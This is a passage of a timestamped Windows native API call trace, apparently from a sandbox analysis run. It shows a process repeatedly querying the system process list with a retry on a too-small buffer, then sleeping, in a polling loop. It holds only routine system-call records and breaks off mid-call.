NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.649] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.664] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.681] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.700] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.711] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.727] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.743] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.792] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.806] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.819] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.838] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.852] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.908] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.924] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0124.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0124.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0124.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0124.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0124.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0124.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0124.979] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.058] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.103] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.150] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.165] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.178] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0125.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0125.194] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0125.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0125.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0125.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0125.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0125.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 